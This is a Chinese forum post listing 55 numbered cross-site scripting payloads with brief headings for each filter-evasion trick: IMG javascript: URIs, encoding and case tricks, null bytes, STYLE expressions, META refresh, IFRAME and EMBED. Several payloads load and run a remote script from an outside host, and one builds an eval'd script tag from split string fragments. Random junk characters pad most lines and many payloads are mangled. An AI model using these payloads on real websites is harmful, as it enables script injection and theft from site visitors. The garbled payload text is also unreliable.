(1)普通的XSS JavaScript注入
7 H, l3 N" B+ A6 ~# p$ G<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
0 ^4 G8 B6 }. o/ y; O0 |(99)另类弹框/ [0 Y$ I1 M# z i
<q/oncut=alert()>1
2 Q: Y$ E6 j# v- M; i! l0 a+ V9 {8 F<s/onclick=alert()>b
% J; |/ {" e7 }8 Z3 n9 O, i* z <XSS=" onclick="alert(1)//">clickme</SSX=">+ a5 q+ f& e o1 e: D
<zzz onclick=alert`1`>clickme</zzz>
( ]/ L" |. ^' V7 ^0 X9 z: K <a onclick=alert`1`>clickme</a>
" v8 R$ J- I! F5 U4 s; D8 J+ V+ O<a=">clickme</a=">$ t% @# h" t' Q
<a=">clickme</a>+ P) Z: o% D7 W* l* B8 j+ A
<z=">clickme</z=">
2 A! J: d" e4 p0 {, }( F<z onclick=alert`1`>clickme</z>4 _6 w5 t. t( [3 d
: e6 \ z; L+ K' C! h(2)IMG标签XSS使用JavaScript命令
/ k: V8 e/ \& S5 |" L) o* e6 A- _2 U<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>' U6 J% s9 z, K/ J
( z* K+ Y9 q) D: E
(3)IMG标签无分号无引号
{ `6 h- ` |9 L8 N0 @( C<IMG SRC=javascript:alert(‘XSS’)>
2 N) a: [+ H' a, o; C
2 ^0 n4 p0 j- z H7 c8 \0 a) i(4)IMG标签大小写不敏感
: ]: x4 E# @. q n<IMG SRC=JaVaScRiPt:alert(‘XSS’)>6 b- O: D9 T* S; k v4 m- l5 K6 [$ W- e$ I
: \/ Q _3 W) x
(5)HTML编码(必须有分号)9 X+ q0 B# o4 {# s
<IMG SRC=javascript:alert(“XSS”)>" [8 I: b4 j& M& F: Y6 `
% L: T$ `" L% f) h. _
(6)修正缺陷IMG标签& }; I- y/ h5 d, Q; ~4 A$ x
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>3 C5 Q) f# a5 `, U8 X
% M5 C Q+ I* t0 ` B; D
(7)formCharCode标签(计算器)) M+ ^4 x( J k) ?5 J, A
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>- w; T' P" c' G3 ]& Q+ e
4 S$ Q, K4 r5 j z" ^8 U4 y
(8)UTF-8的Unicode编码(计算器)
; _8 U; q9 H, E+ j% v) t<IMG SRC=jav..省略..S')>- K% B! G1 F' e4 p( N5 |! u
4 e9 O- n( D8 z& f(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
9 E8 d, E$ u c9 s( i, a<IMG SRC=jav..省略..S')>
' n3 a6 H# |( Q4 o; J' [ H. P0 F0 a, E8 ^+ f1 x% r" y: k
(10)十六进制编码也是没有分号(计算器)
6 Z' u3 d) B u$ j4 h<IMG SRC=\'#\'" /span>: K9 S+ O" f# f* O2 c9 ^* B
/ `# g) D1 N! Y5 f9 y' ?, P(11)嵌入式标签,将Javascript分开5 ]& k" h" X" ^$ G% }2 D% y
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>9 U1 S6 G m6 Y) n# J6 |8 \8 N; ]2 J
0 s4 I5 f% X+ t4 }: U(12)嵌入式编码标签,将Javascript分开
# n& B9 M% A! d, ~8 j<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
& r U- T# n2 y$ ^% o' m# o `, b
(13)嵌入式换行符
$ W3 M2 D% R$ G* m+ E2 q<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>$ o# n1 @- F+ \* l& K- W/ K9 G
; Y& Z1 |3 p3 X: k; |! e8 ^(14)嵌入式回车
L0 L: \9 r8 Q& e! z<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>, F1 E8 l* H- l! V4 i a* [
, e% a7 I' G7 L2 c) s/ x
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
' C. A" S { {% E<IMG SRC=\'#\'" /span>: e$ X6 Y q5 m7 |2 ]% F I4 n
5 g9 ~9 |0 _ ]4 H5 ?) ~7 G% O T(16)解决限制字符(要求同页面)
$ s+ S" |9 V- e" g) ?<script>z=’document.’</script>
" u9 ?# ]+ Y3 l& F8 m0 f<script>z=z+’write(“‘</script>
. }8 U d$ I2 {$ x) R<script>z=z+’<script’</script>& H6 a. a# [) S: I+ y; P
<script>z=z+’ src=ht’</script>
% ^$ T& R& F; w6 S5 F& s: y3 B<script>z=z+’tp://ww’</script>
- I3 \. \; H) ^- ~0 Y<script>z=z+’w.shell’</script>
3 Q: b* W6 E1 l9 f% x+ x) |* o, S<script>z=z+’.net/1.’</script>, c& e, L, H/ J
<script>z=z+’js></sc’</script>
) y1 H' P; r; }<script>z=z+’ript>”)’</script>
' @/ d3 w& X, A3 _! f<script>eval_r(z)</script>; S9 p+ n" T( U1 E' G
8 L7 a# P o; s2 n0 O+ X1 v- p- t(17)空字符
$ g8 R# a. \' I9 Zperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out& q% S8 n9 Y& p) f ]2 r0 \6 O3 q; f
& ^# N" j8 W+ C1 T$ i! ^
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用& ?# s' [6 s6 r
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out+ l$ E q0 F) ~5 P. ~
9 Z# @8 A5 H* `7 q: j
(19)Spaces和meta前的IMG标签- M- e/ s& C) A5 G& K& {
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>* b$ {" L |' C& p
# k! D8 L& w& v3 H- c# ~
(20)Non-alpha-non-digit XSS
; g3 \# n3 r% ]( V1 Q<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
- R5 o' ?2 a, l5 i: V& ]
& n$ Z# X. F. d+ _; l! g(21)Non-alpha-non-digit XSS to 2( e8 U8 L' s% ^3 d7 K! g
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
9 }7 {9 T; m% t
+ M+ x# a6 M- A0 f(22)Non-alpha-non-digit XSS to 3
4 x: t4 Q7 _& X# m<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
( |: K; u D1 t; [7 Y& H
( O1 `( a/ R0 P1 Z9 A. S(23)双开括号* c; Y3 E) j8 Q& f
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
2 Z& {5 \( i2 r H A8 Y
4 i# e M! Z9 P3 H+ i& k& p(24)无结束脚本标记(仅火狐等浏览器)
. e8 y+ d* f1 V& H2 H, d7 c3 j<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>5 m( x5 Q; ^4 Q, g) q% A! J0 c
2 r+ h7 K% a0 w' \% i
(25)无结束脚本标记2
0 ~( Q" d) ]: \4 `) ]. t<SCRIPT SRC=//3w.org/XSS/xss.js>
+ L* L* E. o; K" m" ^0 V' f1 ]4 x# y3 y% l Y0 G
(26)半开的HTML/JavaScript XSS
! k! U" ~2 L D0 c. h: P2 `<IMG SRC=\'#\'" /span>
) {. Q: F% N( O' f
$ f+ V) A' ^- A: K(27)双开角括号
3 {1 }& r9 b! f7 f3 W1 q6 f+ L<iframe src=http://3w.org/XSS.html <
' { \" g! K1 n/ |
) Y# @5 J* F3 W; h' w7 Z(28)无单引号 双引号 分号, I: }# S( c. m" E( {) d9 \
<SCRIPT>a=/XSS/- s9 S5 k3 V, y0 b4 b0 k
alert(a.source)</SCRIPT>
1 s$ q: s5 I! Q* G+ N+ n7 g9 s) L7 X
(29)换码过滤的JavaScript) \' y/ _$ z! {5 p9 T& a. ~3 C0 ^
\”;alert(‘XSS’);//
; ]2 D0 B" S2 n2 ]( g( v# }1 T: o+ T- N6 n, z4 Y9 U$ B
(30)结束Title标签+ X2 z" C1 @3 U+ z3 F; ^: ]
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>2 o! h! h! f' I& q; Q
+ @7 P0 b; q8 X. {1 {$ K
(31)Input Image1 M6 }! |; \3 L
<INPUT SRC=\'#\'" /span>
- M1 t0 G- |- p8 s" _) I1 M% T( |( v% e& @, Y$ T* E1 Y* d
(32)BODY Image4 V w( B8 h/ T
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
* B# S. U6 Q6 l8 ^' z4 u
* ]8 I) S" d5 K0 N9 l' K(33)BODY标签8 g+ L' D% z# x- S# o+ J+ u
<BODY(‘XSS’)>$ s9 z7 v: K% V( t, y6 d
, {' Q3 c4 k7 m5 P1 ^(34)IMG Dynsrc
0 v- ` E9 Z7 z2 k; d<IMG DYNSRC=\'#\'" /span>
4 S3 x1 o9 \8 b& Z& @, o2 O! W n+ K E% B9 U) V
(35)IMG Lowsrc$ k3 q* x& W; S) v
<IMG LOWSRC=\'#\'" /span>; T: G' y' J, a+ k5 C
7 B+ \' G- Y' z1 f6 `
(36)BGSOUND; U7 u7 O5 n9 p8 D
<BGSOUND SRC=\'#\'" /span>% S! M( V# u5 U- m+ w- P5 I1 C
+ ^: h" a: @/ f0 s+ s2 w
(37)STYLE sheet
5 h8 K- g2 `, b) }/ t) t9 l<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>6 N% F- Z+ i& [% m4 a
& D$ g1 R3 |: o+ r @& E(38)远程样式表
6 O( D3 `0 ]2 L( ?& r0 ?$ o<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
4 t4 h# x6 P3 d- ^* L: \
' H: C& |8 `8 i! v! d(39)List-style-image(列表式)3 Y5 I% o' p$ K* m+ T
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS( Y2 u, k8 U: f/ |
5 ~" A! ?# J- @+ [0 x) p* G) u
(40)IMG VBscript
5 o. b2 i' ^1 _<IMG SRC=\'#\'" /STYLE><UL><LI>XSS/ v( ~4 N9 l6 {' J3 D: V
8 L" j# w8 F' _4 M(41)META链接url
" h( o) i4 m2 ]& z5 I7 N<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
3 k2 x W; b/ |; Y6 ^. k/ h9 r
(42)Iframe1 I( Z! R7 y/ e. \" C. J
<IFRAME SRC=\'#\'" /IFRAME>
0 u. q8 i2 N+ W# f' v) V, F) H+ _# Q G: j
(43)Frame
- U) X8 z+ u7 e9 m<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>7 g* M' e% P- [# H# a# q
$ d5 q" `: r7 e/ ^8 `9 M7 }( A
(44)Table9 T6 r1 a5 ~) k) ^ M
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>: k' `" Y9 R$ X' B
& _- y& b: ~" K6 n4 p, U: b
(45)TD
: B x" V, Z- o! k<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>+ | @ m: L6 x" ^ v; @, t( \
8 V( T& W' s6 B7 F
(46)DIV background-image
( W- M7 _ H( A4 n% U<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>) @- n8 K/ N0 |/ \" o4 O" s
; e- r. g! y3 L+ o- w! h(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)) g0 [& b) C1 }# D" @9 q' E) H( K
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
! O6 i% _* M E( |' I1 T! N X/ @) C# x6 s: l, M- f
(48)DIV expression
+ w+ \! I" H5 c P6 U$ z+ x, ~<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
9 K' `0 m. o4 E* y
: x7 U# D& A2 q- F, ~8 |6 r(49)STYLE属性分拆表达- _ G7 B: v0 \+ D
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
+ U0 @1 l) n" d3 [! Y ]% L8 `" d
7 V) u+ \; m7 {: c(50)匿名STYLE(组成:开角号和一个字母开头)
& \0 ]4 \6 \/ n6 P8 T* ~ d<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>* W# N8 y6 J: b
# @% O# W$ y+ _4 A/ B/ m; P' y+ W4 t
(51)STYLE background-image- a% F5 |. d% u( i% i- S
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>, `; P1 \8 `7 ~" k! U/ Q' K- g0 d
8 M- z6 [. H5 j(52)IMG STYLE方式
( b* e* x1 b. N! k% l7 J3 sexppression(alert(“XSS”))’>) u! j8 H! @6 S4 k
8 G" Z9 G- W& F+ V" B6 E9 d/ P(53)STYLE background
% H: P6 O- {3 B' [1 c. n<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
1 p2 u) Z N- Z0 l" W: P3 j e- p, F0 e" \0 `: {
(54)BASE
( p: o7 t" z4 g# }<BASE HREF=”javascript:alert(‘XSS’);//”>$ L* { O I2 i* A- B5 V
/ o1 q O1 B0 o, i7 X) {' n(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
" h2 ]1 ~* ^' @/ i& T<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
) S3 Y& ^' m4 Q1 G5 F |
发表于 2016-4-28 10:06:15
收藏
支持
反对